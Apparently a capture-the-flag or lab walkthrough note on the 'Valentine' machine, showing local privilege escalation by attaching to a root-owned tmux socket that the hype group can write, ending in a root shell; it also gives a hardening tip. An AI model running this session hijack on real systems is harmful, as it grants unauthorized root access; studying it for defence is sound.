5 privesc tmux

Hijacking Tmux

# Check whether root is running a tmux server; the -S argument in its command line is the socket path it listens on
hype@Valentine:~$ ps aux | grep tmux
root       1029  0.0  0.1  26416  1672 ?        Ss   12:59   0:00 /usr/bin/tmux -S /.devs/dev_sess
hype      22736  0.0  0.0  13576   924 pts/0    S+   13:50   0:00 grep --color=auto tmux

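# Can we read and write that socket? Yes: it is owned root:hype with mode srw-rw----, so the hype group has read/write access.
# Access to this tmux server is gated only by the socket's file permissions, so connecting with -S attaches to root's session (shown below).
# Hardening: a root-owned tmux socket should be mode 0600, owned root:root, and live in a directory only root can traverse.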
hype@Valentine:~$ ls -la /.devs/dev_sess
srw-rw---- 1 root hype 0 May  6 12:59 /.devs/dev_sess

hype@Valentine:~$ tmux -S /.devs/dev_sess
root@Valentine:/home/hype# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
[exited]
